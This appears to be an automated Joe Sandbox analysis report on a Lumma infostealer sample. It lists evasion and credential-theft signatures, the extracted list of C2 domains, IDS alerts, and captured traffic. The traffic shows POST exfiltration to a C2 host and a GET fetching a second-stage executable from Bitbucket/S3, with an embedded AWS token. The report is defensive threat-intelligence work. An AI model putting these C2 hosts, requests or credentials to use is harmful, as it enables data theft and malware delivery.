Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BJQizQ6sqT.exe

Overview

General Information

Sample name:BJQizQ6sqT.exe
renamed because original name is a hash value
Original sample name:daed40d82d8d43f2ad0be3fb944c99a3.exe
Analysis ID:1579796
MD5:daed40d82d8d43f2ad0be3fb944c99a3
SHA1:00a4b14b4e574ac6e5c1136b0ee9789c3cf26b61
SHA256:ac43fe948b1c2c1039fb007c8ca7da8575b1ffa60b5bcd4de626fc9dc7aa55fa
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • BJQizQ6sqT.exe (PID: 4140 cmdline: "C:\Users\user\Desktop\BJQizQ6sqT.exe" MD5: DAED40D82D8D43F2AD0BE3FB944C99A3)
    • WerFault.exe (PID: 1268 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1988 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["supporse-comment.cyou", "steppriflej.xyz", "greywe-snotty.cyou", "ripe-blade.cyou", "cuddlyready.xyz", "hosue-billowy.cyou", "smash-boiling.cyou", "sendypaster.xyz", "pollution-raker.cyou"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: BJQizQ6sqT.exe PID: 4140JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: BJQizQ6sqT.exe PID: 4140JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          Process Memory Space: BJQizQ6sqT.exe PID: 4140JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:16:41.578258+010020283713Unknown Traffic192.168.2.649721172.67.150.173443TCP
              2024-12-23T09:16:43.576322+010020283713Unknown Traffic192.168.2.649722172.67.150.173443TCP
              2024-12-23T09:16:46.568277+010020283713Unknown Traffic192.168.2.649727172.67.150.173443TCP
              2024-12-23T09:16:49.148799+010020283713Unknown Traffic192.168.2.649728172.67.150.173443TCP
              2024-12-23T09:16:51.897153+010020283713Unknown Traffic192.168.2.649739172.67.150.173443TCP
              2024-12-23T09:16:54.597336+010020283713Unknown Traffic192.168.2.649746172.67.150.173443TCP
              2024-12-23T09:16:57.153372+010020283713Unknown Traffic192.168.2.649752172.67.150.173443TCP
              2024-12-23T09:17:02.105430+010020283713Unknown Traffic192.168.2.649763172.67.150.173443TCP
              2024-12-23T09:17:04.644220+010020283713Unknown Traffic192.168.2.649769185.166.143.48443TCP
              2024-12-23T09:17:07.061631+010020283713Unknown Traffic192.168.2.6497763.5.29.90443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:16:42.339574+010020546531A Network Trojan was detected192.168.2.649721172.67.150.173443TCP
              2024-12-23T09:16:44.341927+010020546531A Network Trojan was detected192.168.2.649722172.67.150.173443TCP
              2024-12-23T09:17:02.919814+010020546531A Network Trojan was detected192.168.2.649763172.67.150.173443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:16:42.339574+010020498361A Network Trojan was detected192.168.2.649721172.67.150.173443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:16:44.341927+010020498121A Network Trojan was detected192.168.2.649722172.67.150.173443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T09:16:47.622739+010020480941Malware Command and Control Activity Detected192.168.2.649727172.67.150.173443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: BJQizQ6sqT.exeAvira: detected
              Source: BJQizQ6sqT.exe.4140.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["supporse-comment.cyou", "steppriflej.xyz", "greywe-snotty.cyou", "ripe-blade.cyou", "cuddlyready.xyz", "hosue-billowy.cyou", "smash-boiling.cyou", "sendypaster.xyz", "pollution-raker.cyou"], "Build id": "LOGS11--LiveTraffic"}
              Source: BJQizQ6sqT.exeReversingLabs: Detection: 60%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: BJQizQ6sqT.exeJoe Sandbox ML: detected
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: pollution-raker.cyou
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: hosue-billowy.cyou
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: ripe-blade.cyou
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: smash-boiling.cyou
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: supporse-comment.cyou
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: greywe-snotty.cyou
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: steppriflej.xyz
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sendypaster.xyz
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: cuddlyready.xyz
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
              Source: BJQizQ6sqT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.6:49763 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.29.90:443 -> 192.168.2.6:49776 version: TLS 1.2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeDirectory queried: number of queries: 1001

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49721 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49721 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49722 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49722 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49727 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49763 -> 172.67.150.173:443
              Source: Malware configuration extractorURLs: supporse-comment.cyou
              Source: Malware configuration extractorURLs: steppriflej.xyz
              Source: Malware configuration extractorURLs: greywe-snotty.cyou
              Source: Malware configuration extractorURLs: ripe-blade.cyou
              Source: Malware configuration extractorURLs: cuddlyready.xyz
              Source: Malware configuration extractorURLs: hosue-billowy.cyou
              Source: Malware configuration extractorURLs: smash-boiling.cyou
              Source: Malware configuration extractorURLs: sendypaster.xyz
              Source: Malware configuration extractorURLs: pollution-raker.cyou
              Source: DNS query: cuddlyready.xyz
              Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
              Source: Joe Sandbox ViewIP Address: 172.67.150.173 172.67.150.173
              Source: Joe Sandbox ViewIP Address: 172.67.150.173 172.67.150.173
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49722 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49727 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49746 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49776 -> 3.5.29.90:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49763 -> 172.67.150.173:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49769 -> 185.166.143.48:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3Y5WVLYMONUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12817Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YHM4QLNTIXGPL8F56EKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15117Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A3I60YPXCYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19921Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OSG0OVPTVU5QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1227Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BEW3OHZ1BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552416Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGtwUYLI8ss7iCUu3%2F4DLuSnpjWWZnqTaXZoXzVQPV4Vlk6XlKlKT7S4pndYf6L%2FYGO35VtkeuLMX4lXVHOOtxovSF3Q%3D%3D&Expires=1734943238 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGtwUYLI8ss7iCUu3%2F4DLuSnpjWWZnqTaXZoXzVQPV4Vlk6XlKlKT7S4pndYf6L%2FYGO35VtkeuLMX4lXVHOOtxovSF3Q%3D%3D&Expires=1734943238 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: cuddlyready.xyz
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: BJQizQ6sqT.exe, 00000000.00000003.2368237256.000000000103B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microH
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digi6
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468878619.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543983298.0000000006029000.00000002.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468837205.00000000058F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
              Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264888134.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BJQizQ6sqT.exe, 00000000.00000003.2212200624.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2208114671.0000000005917000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2207176570.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BJQizQ6sqT.exe, 00000000.00000003.2469469366.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2543396017.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
              Source: BJQizQ6sqT.exe, 00000000.00000003.2468908020.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
